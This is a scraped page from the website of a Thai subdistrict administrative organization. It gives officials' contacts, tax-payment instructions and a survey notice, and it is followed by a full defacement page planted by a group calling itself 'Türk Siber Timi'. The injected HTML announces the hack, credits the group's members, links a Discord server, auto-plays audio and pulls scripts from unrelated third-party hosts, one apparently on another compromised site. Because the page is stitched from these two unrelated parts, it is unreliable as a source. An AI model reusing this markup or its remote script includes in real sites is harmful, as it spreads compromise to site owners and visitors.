นายกองค์การบริหารส่วนตำบล

ว่าที่ร้อยตรี สุรศักดิ์ แก้วเกื้อ

  087-8840581

    ปลัดองค์การบริหารส่วนตำบล

นางสารภี โชติพันธ์

  087-2710365

    รองนายกองค์กาารบริหารส่วนตำบลควนกรด

ร.ท.ประภาส หมวดเมือง

  081-3703739

    รองนายกองค์กาารบริหารส่วนตำบลควนกรด

นายสุรชาติ รัตนพันธ์

  090-1659134

    เลขานุการนายกองค์การบริหารส่วนตำบลควนกรด

นางสาวพรทิพย์ ทองกระจ่าง

  089-1956937

ช่องทาง ในการรับชำระภาษี องค์การบริหารส่วนตำบลควนกรด

เพื่อความสะดวกของทุกท่าน

1. ติดต่อชำระภาษีโดยตรงกับเจ้าหน้าที่ฝ่ายพัฒนารายได้ กองคลัง องค์การบริหารส่วนตำบลควนกรด

2. ชำระภาษีด้วยการโอนเงิน ผ่านบัญชี ธกส ชื่อบัญชีองค์การบริหารส่วนตำบลควนกรด เลขที่บัญชี 011152229856

เช็คยอด ภาษี กับเจ้าหน้าที่

✅   โอนตามจำนวนเงินที่ระบุ ไม่ปัดเศษสตางค์

✅   โอนเสร็จแล้วโทรแจ้ง 075-355913 เพื่อรอรับใบเสร็จรับเงิน

✅   หรือส่งสลิปการโอน ทางช่องทางเพจนี้ พร้อมชื่อและเบอร์โทร ของเจ้าของทรัพย์สิน เพื่อรอรับใบเสร็จรับเงิน

ท้องถิ่นดี ภาษีช่วย ท้องถิ่นสวย ภาษีสร้าง

องค์การบริหารส่วนตำบลควนกรด

กรมส่งเสริมการปกครองท้องถิ่น

ขอความร่วมมือท่าน

ตอบบแบบสำรวจความพึงพอใจของประชาชนต่อการจัดการบริการสาธารณะขององค์กรปกครองส่วนท้องถิ่น
เพื่อนำข้อมูลที่เป็นประโยชน์มาใช้ในการพัฒนาส่งเสริม และปรับปรุง การบริการสาธารณะขององค์กรปกครองส่วนท้องถิ่น ให้แก่ประชาชน

ตั้งแต่วันนี้ ถึงวันที่ 30 มิถุนายน 2565

    ข้อบัญญัติงบประมาณรายจ่าย

    สถิติเรื่องร้องเรียนร้องทุกข์การทุจริต

    แผนบริหารความเสี่ยง

    ปฏิทินกิจกรรม

22  พฤษภาคม 2565
23  พฤษภาคม 2565
24  พฤษภาคม 2565
25  พฤษภาคม 2565
26  พฤษภาคม 2565

    ประวัติความเป็นมา

ประวัติความเป็นมา

<!--[if IE 7]>
<link rel="stylesheet" type="text/css" href="catalog/view/theme/default/stylesheet/ie7.css" />
<![endif]-->
<!--[if lt IE 7]>
<link rel="stylesheet" type="text/css" href="catalog/view/theme/default/stylesheet/ie6.css" />
<script type="text/javascript" src="catalog/view/javascript/DD_belatedPNG_0.0.8a-min.js"></script>
<script type="text/javascript">
DD_belatedPNG.fix('#logo img');
</script>
<![endif]-->
<html>
<head>
<title>Hacked By Türk Siber Timi | </title>
<link rel="SHORTCUT ICON" href="https://cdn.discordapp.com/attachments/932710029927260190/938543963688796190/1643654333070.png" type="image/x-icon"/>
<meta name="author"    content="TÜRK SİBER TİMİ">
<meta name="description"    content="Hacked by Türk Siber Timi  !">
<meta property="og:image"    content="https://i.hizliresim.com/5s6ccnp.jpg">
<meta property="og:image:width"    content="1200"/>
<meta property="og:image:height"    content="630"/>
<link href='http://fonts.googleapis.com/css?family=Orbitron:700|Gruppo' rel='stylesheet' type='text/css'>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
<script src="http://www.nycfragrance.com/csvcategoryimportver1.0.3/system/css/layout/js/crazyIntro.js"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/27qrxwqx674059d/jquery-1.11.1.min.js"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/yzmc24cuj9dl8ih/bootstrap.min.js"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/9arv5tpx9yucnlf/jquery.cycle.min.js"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/is1vrbl5jmdsel9/jquery.backstretch.min.js"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/geo5dr110vx63cl/scripts.js"></script>
<script type="text/javascript" src="http://smilenet4u.googlecode.com/files/TipingText.js"></script>

<script type="text/javascript" src="catalog/view/javascript/jquery/ui/jquery-ui-1.8.16.custom.min.js"></script>
<link rel="stylesheet" type="text/css" href="catalog/view/javascript/jquery/ui/themes/ui-lightness/jquery-ui-1.8.16.custom.css" />
<script type="text/javascript" src="catalog/view/javascript/common.js"></script>
<script type="text/javascript" src="catalog/view/javascript/jquery/flexslider/jquery.flexslider.js"></script>

<script type="text/javascript" src="catalog/view/javascript/jquery/flexslider/jquery.mousewheel.js"></script>

<link href='https://fonts.googleapis.com/css?family=Abel' rel='stylesheet' type='text/css'>


<style>
html {
    background-color: black;
    background-image: -webkit-linear-gradient(top, transparent, rgba(0,200,0,.1) 30%, rgba(0,200,0,.1) 70%, transparent), -webkit-repeating-linear-gradient(top, transparent, rgba(0,127,0,.2) 2px, transparent 4px);
    background-image: -moz-linear-gradient(top, transparent, rgba(0,200,0,.1) 30%, rgba(0,200,0,.1) 70%, transparent), -moz-repeating-linear-gradient(top, transparent, rgba(0,127,0,.2) 2px, transparent 4px);
    background-image: linear-gradient(transparent, rgba(0,200,0,.1) 30%, rgba(0,200,0,.1) 70%, transparent), repeating-linear-gradient(transparent, rgba(0,127,0,.2) 2px, transparent 4px);
    background-size: 100% 180px, 100% 100%;
    -webkit-animation: crt 10s infinite;
    -moz-animation: crt 10s infinite;
    animation: crt 10s infinite;
    color: #0a0;
    font-weight: bold;
    font-family: "Fixedsys", monospace;
}

@-webkit-keyframes crt {
    0% { background-position: 0 0, 0 0; -webkit-animation-timing-function: linear; }
    100% { background-position: 0 -180px, 0 0; }
}
@-moz-keyframes crt {
    0% { background-position: 0 0, 0 0; -moz-animation-timing-function: linear; }
    100% { background-position: 0 -180px, 0 0; }
}
@keyframes crt {
    0% { background-position: 0 0, 0 0; animation-timing-function: linear; }
    100% { background-position: 0 -180px, 0 0; }
}

body {
    -webkit-animation: text-blur 4s infinite, text-blink 11s infinite;
    animation: text-blur 4s infinite, text-blink 11s infinite;
    color: transparent;
    overflow-x: hidden;
}

@-webkit-keyframes text-blur {
    0%, 50%, 90%, 100% { text-shadow: #0a0 0 0 1px; }
    60%, 80% { text-shadow: #0a0 0 0 2px; }
    70% { text-shadow: #0a0 0 0 5px; }
}
@keyframes text-blur {
    0%, 50%, 90%, 100% { text-shadow: #0a0 0 0 1px; }
    60%, 80% { text-shadow: #0a0 0 0 2px; }
    70% { text-shadow: #0a0 0 0 5px; }
}
@-webkit-keyframes text-blink {
    0% {
        -webkit-transform: skewX(0deg);
    }
    20% {
        -webkit-transform: skewX(0deg);
    }
    21% {
        -webkit-transform: skewX(-3deg);
    }
    35% {
        opacity: 1;
        -webkit-transform: skewX(0deg);
    }
    35.5% {
        opacity: .3;
        -webkit-transform: skewX(70deg);
    }
    36% {
        -webkit-transform: skewX(-60deg);
    }
    36.5% {
        opacity: 1;
        -webkit-transform: skewX(0deg);
    }
    100% {
        -webkit-transform: skewX(0deg);
    }
}
@keyframes text-blink {
    0% {
        transform: skewX(0deg);
    }
    20% {
        transform: skewX(0deg);
    }
    21% {
        transform: skewX(-3deg);
    }
    35% {
        opacity: 1;
        transform: skewX(0deg);
    }
    35.5% {
        opacity: .3;
        transform: skewX(70deg);
    }
    36% {
        transform: skewX(-60deg);
    }
    36.5% {
        opacity: 1;
        transform: skewX(0deg);
    }
    100% {
        transform: skewX(0deg);
    }
}

a {
    color: inherit;
}

a.folder {
    //color: #88f;
}

p {
    margin: .1em 0;
}

ul {
    list-style: none;
    padding: 0 0 0 1em;
}

@-webkit-keyframes blink {
    0% { opacity: 0; }
    25% { opacity: 0; }
    25.1% { opacity: 1; }
    100% { opacity: 1; }
}
blink {
    -webkit-animation: blink 1s infinite;
}

</style>
<script async src='/cdn-cgi/bm/cv/669835187/api.js'></script></head>
<style>
body{
background-image:url('http://2.bp.blogspot.com/-z7dzaALPyQQ/TcdpZ44TcPI/AAAAAAAAAZw/VVgoCu5sN10/s1600/dot.gif');
margin:0px;
background-attachment: scroll;
font-family:'Orbitron', sans-serif;
color:#FFF;
width:100%;
height:100%;
}
pre{
font-family:'Orbitron',sans-serif;
}
#plate{
position: absolute;!important;
top:0!important;
left:0;
right:0;
width:100%;
height:100%;
z-index:-1!important;
margin:0;
padding:0;
position:fixed;
background-color:rgba(0, 0, 0, 0.18);
}


</style>

<body class="unselectable">

<div id="plate">
<canvas height="50%" width="50%" id="gravity"></canvas>
</div>

 


<img border="0" style="left: 0px; position: absolute; top: 0px;" alt="" border="0"   src="" /><center>
<center><img src="https://cdn.discordapp.com/attachments/932710029927260190/938543963688796190/1643654333070.png" width="446px" height="300x"></center>
<center>
<b><font size="5px" face="Abel" color="white"><a href="https://discord.gg/fRz9qwFr2m" style="text-decoration:none;color:white;font-size:30px;">HACKED BY TÜRK SİBER TİMİ</a><br>
<b><font size="5px" face="Abel" color="red">~~ INTO YOUR SYSTEM ~~<br>
<b><font size="5px" face="Abel" color="white">~~ The story of a legend unfinished ~~<br>
<b><font size="5px" face="Abel" color="red">~~ Has Been Hacked By Türk Siber TİMİ ~~<br>

<b><font size="4px" face="Abel" color="red"> Beyazkurt/Yunus_Emre/Hegemon/Aytlogo_luxer/555a/FlowFlex/ARONİS/Uchiha Madara/FuckTheLegend/cardolx/Chapos/CNRBOSSİNG</b></br></center>
<img src="https://c.tenor.com/SD5OHxvGofIAAAAM/atat%C3%BCrk.gif" width="150" height="120">

<script type="text/javascript">
new TypingText(document.getElementById("xx"), 300, function(i){ var ar = new Array("&#139;"); return ar[i.length % ar.length]; });
TypingText.runAll();
</script>
<script language="JavaScript">

 

document.writeln('<iframe width="140" height="121" src="https://j.top4top.io/m_21074091n1.mp3" frameborder="0"></iframe>');
</script>
</center>
<script type="text/javascript">(function(){window['__CF$cv$params']={r:'6d76d179ab9292dd',m:'dqxdA5XIeW10zzwHBcwyU8nt8CnfE7rslC7GwtrhZZA-1643840547-0-Ac/tEEGQ20pCk7svZAuzfR8Es48bw5WW8pwjaXrXUjnrosHAd40hgTeN5ncat3KUtE/qBFxFhO/pFvzDqz6MebebWgtWBZ1edv/XHrSjHphMAbbRAKT9/6goY/A5PPsvDPpeNyRSL+gSQbWMTQ7KkJoHIZ0JAjuedM1Dg0LOyBZKre5ZQlmUkZJCtRoiN1J2rFuvorifIW2JwlDwl3ZnrlE=',s:[0x8416f2a029,0x2dc5f1b924],}})();</script></body>
</html></head>